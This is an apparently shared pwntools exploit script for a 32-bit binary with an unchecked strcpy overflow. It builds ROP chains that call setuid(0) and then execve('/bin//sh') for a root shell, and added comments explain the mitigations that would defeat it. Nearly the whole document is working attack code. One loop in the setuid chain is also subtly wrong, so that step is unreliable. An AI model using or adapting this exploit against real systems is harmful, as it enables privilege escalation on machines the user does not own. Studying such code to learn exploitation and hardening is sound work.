
exploit code strcpy

Jun 18th, 2019
  1. #!/usr/bin/python
  2. from pwn import *
  3. #from subprocess import call
  4.  
def main():
    """Build a two-stage ROP payload (setuid(0), then execve("/bin//sh")) for a
    32-bit binary reached through an unchecked strcpy.

    Everything is hard-coded for one particular build: the gadget and .data
    addresses below are absolute (0x0804xxxx-0x080exxxx), so the chain only
    lines up against a non-PIE image loaded at a fixed base. Read defensively,
    it relies on exactly what a hardened build removes: a fixed load address
    (PIE + ASLR), an unprotected saved return address (-fstack-protector), and
    an unbounded copy (strcpy rather than a length-checked copy). NX/DEP on its
    own does not stop it, since no injected code runs, only instruction
    sequences that already exist in the binary; detection therefore rests on
    the overflow itself (canary abort, oversized argument) rather than on the
    payload looking like code.

    The payload is printed to stdout and written to the file 'test' in the
    current directory; this script executes nothing itself (the call() line
    at the end is commented out).

    NOTE(review): Python 2 syntax (print statement, p32() output concatenated
    onto a str); it will not run unchanged under Python 3.
    """
    # 1094205761 found at offset: 112
    # 1094205761 == 0x41384141: presumably the pattern value that landed in
    # the saved return address during the offset search, 112 bytes in.
    offset = 112

    # Gadgets: each comment gives the disassembly the address resolves to in
    # the target binary. Being absolute, all of them are invalidated by PIE.
    # 0x08049453 : xor eax, eax ; ret
    xor_eax = p32(0x08049453)  

    # 0x0807a65f : inc eax ; ret
    inc_eax = p32(0x0807a65f)

    # 0x080d5e5d : inc ebx ; ret
    inc_ebx = p32(0x080d5e5d)

    # 0x080d5b4f : inc ecx ; ret
    inc_ecx = p32(0x080d5b4f)

    # 0x0805cd67 : inc edx ; ret
    inc_edx = p32(0x0805cd67)

    # 0x0806f27c : nop ; nop ; nop ; int 0x80
    int_80 = p32(0x0806f27c + 4)

    # 0x080546ab : mov dword ptr [edx], eax ; ret
    mov_to_addr_edx_from_eax = p32(0x080546ab)

    # 0x0806ec7a : pop edx ; ret
    pop_edx = p32(0x0806ec7a)

    # 0x080b7fc6 : pop eax ; ret
    pop_eax = p32(0x080b7fc6)

    # 0x080de6b1 : pop ecx ; ret
    pop_ecx = p32(0x080de6b1)

    # 0x080481c9 : pop ebx ; ret
    pop_ebx = p32(0x080481c9)

    # 0x080481b2 : ret
    # NOTE(review): assigned the pop_ebx address rather than the one in the
    # comment above; unused by the chains below either way.
    ret = p32(0x080481c9)

    # 080ea060 l    d  .data  00000000 .data
    # Writable scratch space in .data: the two 4-byte stores below assemble
    # the string "/bin//sh" here (the doubled slash pads it to exactly 8
    # bytes without needing a NUL inside the copied payload).
    bin_addr = p32(0x080ea060)
    sh_addr = p32(0x080ea060 + 4)
    bin_sh = bin_addr # Refers to the whole '/bin//sh' string

    # execve(const char *pathname, char *const argv[], char *const envp[]) 
    #   eax     ebx         ecx             edx             esi
    #   0x0b    char __user *   char __user *__user *   char __user *__user *   struct pt_regs *
    # (32-bit Linux syscall convention: number in eax, arguments in ebx/ecx/edx.)

    # Writes bin to bin_addr
    rop_shell = ""
    rop_shell += pop_edx # Pops the next value(bin_addr) to the edx register
    rop_shell += bin_addr # bin_addr to be stored in the edx register
    rop_shell += pop_eax # Pops the next value, "/bin" to the eax register
    rop_shell += "/bin" # "/bin" to be stored in the eax register
    rop_shell += mov_to_addr_edx_from_eax # Moves the "/bin" string to the address in edx register

    # Writes sh to sh_addr
    rop_shell += pop_edx # Pops the next value(sh_addr) to the edx register
    rop_shell += sh_addr # sh_addr to be stored in the edx register
    rop_shell += pop_eax # Pops the next value, "//sh" to the eax register 
    rop_shell += "//sh" # "//sh" to be stored in the eax register
    rop_shell += mov_to_addr_edx_from_eax # Moves the "//sh" string to the addres in edx register  

    # Sets eax to 0x0b
    # 0xb = 11
    rop_shell += xor_eax # Zero-ing eax register

    for i in range(1, 12): # Increments eax until its value is 0xb(11) is reached
        rop_shell += inc_eax # Increments eax register by 1

    # Stores the address of "/bin//sh" in ebx
    rop_shell += pop_ebx # Pops the next value(bin_sh) to the ebx register
    rop_shell += bin_sh # bin_sh to be stored in the ebx register  

    # Sets ecx to 0
    # strcpy stops at the first NUL byte, so no 4-byte word in the chain may
    # contain 0x00; zero is therefore built as 0xffffffff + 1 (same trick for
    # edx and ebx below).
    rop_shell += pop_ecx # Pops the next value(0xffffffff) to the ecx register
    rop_shell += p32(0xffffffff) # We can't directly store null value since strcpy will fail
    rop_shell += inc_ecx # 0xffffffff + 0x1 = 0x00000000

    # Sets edx to 0
    rop_shell += pop_edx # Pops the next value(0xffffffff) to the edx register
    rop_shell += p32(0xffffffff) # We can't directly store null value since strcpy will fail
    rop_shell += inc_edx # 0xffffffff + 0x1 = 0x00000000

    # Do a syscall execve("/bin/sh", 0, 0) 
    # Eax : 0xb , Ebx: "/bin/sh", Ecx: 0, Edx: 0
    rop_shell += int_80

    #   eax     ebx
    #   0x17    old_uid_t uid  

    # Sets eax to 0x17(23)
    rop_setuid = ""
    rop_setuid += xor_eax # Zero-ing the eax register

    for i in (1, 24): # Increments eax register from 0 till its value is 0x17(23) is reached
        rop_setuid += inc_eax # Increments eax register by 1

    # Sets ebx to 0
    rop_setuid += pop_ebx # Pops the next value(0xffffffff) to the ebx register
    rop_setuid += p32(0xffffffff) # We can't directly store null value since strcpy will fail
    rop_setuid += inc_ebx # 0xffffffff + 0x1 = 0x00000000  

    # Do a syscall setuid(0)
    # Eax: 0x17 , Ebx: 0
    rop_setuid += int_80

    # Joins the initial payload with ROP's
    # setuid chain first, execve chain second: each gadget's ret consumes the
    # next word, so the stack is walked upward in exactly this order.
    payload = "A" * offset # Padding buffer with junk till offset
    payload += rop_setuid
    payload += rop_shell
    print payload # Display payload in console

    # Writes payload to file for debugging purposes
    # Text-mode open; under Python 2 on Linux the str is written unchanged.
    fname = 'test'
    with open(fname, 'w') as f:
        f.write(payload)

    # Executes exploit via call : unstable
    # Workaround: ./vuln $(cat test)
    # call(["./vuln", payload])
  127.  
if __name__ == "__main__":
    # Script entry point: main() only builds, prints and writes the payload.
    main()